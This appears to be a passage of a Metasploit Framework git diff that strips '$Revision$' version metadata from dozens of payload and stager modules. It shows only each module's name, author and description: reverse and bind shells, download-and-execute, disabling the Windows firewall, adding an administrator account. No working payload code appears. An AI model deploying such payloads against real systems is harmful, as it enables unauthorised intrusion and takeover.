b/modules/payloads/singles/solaris/sparc/shell_find_port.rb index fe5ebc4ea2..47d3ea35e8 100644 --- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb +++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb index 6c928723c1..27eb565091 100644 --- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb index 11c4db74c8..c6138aa319 100644 --- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb index 52f9012a9a..aa71ce0b0c 100644 --- a/modules/payloads/singles/solaris/x86/shell_find_port.rb +++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb index e497335804..52b8a02417 100644 --- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index 5a37c0a8e8..a9208f52d3 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix TTY, Interact with Established Connection', - 'Version' => '$Revision$', 'Description' => 'Interacts with a TTY on an established socket connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index 6111432366..47248dda3c 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -22,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Execute net user /ADD', - 'Version' => '$Revision$', 'Description' => %q{ Create a new user and add them to local administration group. diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index bb897820ad..213ff6dcf3 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb @@ -21,7 +21,6 @@ module Metasploit3 'corelanc0d3r ' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Platform' => 'win', 'Arch' => ARCH_X86 )) diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index c3e1a29abe..cef4369431 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -22,7 +22,6 @@ module Metasploit3 'corelanc0d3r ' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Platform' => 'win', 'Arch' => ARCH_X86 )) diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index fdd4bb3c6d..6993dfe898 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -15,7 +15,6 @@ require 'msf/core/payload/windows/exec' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::Exec end diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb index d50f190d8f..c1be8a48d2 100644 --- a/modules/payloads/singles/windows/loadlibrary.rb +++ b/modules/payloads/singles/windows/loadlibrary.rb @@ -15,7 +15,6 @@ require 'msf/core/payload/windows/loadlibrary' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::LoadLibrary end diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index 7f30e51876..7aca7e92aa 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -24,7 +24,6 @@ module Metasploit3 'jduck' # some ruby factoring ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Platform' => 'win', 'Arch' => ARCH_X86 )) diff --git a/modules/payloads/singles/windows/metsvc_bind_tcp.rb b/modules/payloads/singles/windows/metsvc_bind_tcp.rb index 0356ea4d89..e3716440c0 100644 --- a/modules/payloads/singles/windows/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_bind_tcp.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Meterpreter Service, Bind TCP', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb index 57fc24b0fb..8c454fae4b 100644 --- a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Meterpreter Service, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index 5c4166ba7d..3322a3c5e1 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => [ 'vlad902', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index 81d15d37ea..01901df2b1 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Disable Windows ICF, Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Disable the Windows ICF, then listen for a connection and spawn a command shell', 'Author' => 'Lin0xx ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index fe7ec5efa2..a8ce243c83 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'vlad902', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/speak_pwned.rb b/modules/payloads/singles/windows/speak_pwned.rb index 5f872a1d26..e49248c325 100644 --- a/modules/payloads/singles/windows/speak_pwned.rb +++ b/modules/payloads/singles/windows/speak_pwned.rb @@ -48,7 +48,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Speech API - Say "You Got Pwned!"', - 'Version' => '$Revision$', 'Description' => 'Causes the target to say "You Got Pwned" via the Windows Speech API', 'Author' => [ 'Berend-Jan "SkyLined" Wever ' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index d81438b4b3..f4c4c6bad5 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb index c3d296e34d..0bf3965f68 100644 --- a/modules/payloads/singles/windows/x64/loadlibrary.rb +++ b/modules/payloads/singles/windows/x64/loadlibrary.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 LoadLibrary Path', - 'Version' => '$Revision$', 'Description' => 'Load an arbitrary x64 library path', 'Author' => [ 'scriptjunkie', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb index 71f8d7590a..9234348a01 100644 --- a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb index 2a6355e102..1273392260 100644 --- a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb index 6efad317e5..54d28de9fa 100644 --- a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb @@ -29,7 +29,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => ['skape', 'vlad902', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index e086f3e4cb..715d5aae55 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index cda934bcbc..7bbe5db2ec 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index 8dcd032031..8fa290acf6 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -30,7 +30,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker over IPv6', 'Author' => ['skape', 'vlad902', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index 307591c9d6..1e52219699 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 9cf2ccc2ff..6498a1d2aa 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index fd51fa7db8..a4f81f0af9 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index ce670274f3..81f4c26e70 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index e0868e8a8e..04a8e33ef4 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse HTTP Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index eeb91f4613..173abe2a11 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse HTTPS Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTPS', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index 87e2c90e4e..fda226b792 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back stager', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index 490a260b36..875e86c5b2 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index b13ea45308..6a7604afd0 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index f5d9feb61c..d4da6df25b 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -21,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => [ 'kris katterjohn', # original diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index a947b5c3b9..98d116b415 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb @@ -30,7 +30,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index ab0e44046d..ddf1aa9a24 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -26,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => [ 'skape', # original diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index fa4ae20e1f..11bd5b381f 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -26,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index fd79028bab..e133d29c51 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -21,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker over IPv6', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index 3e7aa7e599..8b0dc22abb 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -30,7 +30,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index a89f8b611d..53da3eeb00 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -26,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => [ 'skape', # original diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 3d14848544..c4b9316b15 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'toto', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index a699bed676..dc4b32c2bf 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index 440d642d97..b625c22156 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 7b157595ce..881c3c4fc6 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index ad46d8d8c5..e929d86a13 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 574071e770..9f53a20067 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 99174393eb..98dcbec86d 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen, read length, read buffer, execute', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 0370a881ba..186a880054 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect, read length, read buffer, execute', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index 6dfd8234d3..88c8a78f84 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -23,7 +23,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen, read length, read buffer, execute', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index e739859f40..f50f918eea 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -23,7 +23,6 @@ module Metasploit3 def initialize(info = { }) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect, read length, read buffer, execute', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index e07bd47c46..0567e4dfcb 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => ['egypt'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index e90b0ecdac..b5788486b0 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -21,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => ['egypt'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index 751e71fd85..0ccb5ee617 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Reverse PHP connect back stager with checks for disabled functions', 'Author' => 'egypt', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index 88aaff889d..9ddd30dec0 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -22,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => ['hdm', 'skape'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 30f9e5a36e..f0cc04dfa9 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ 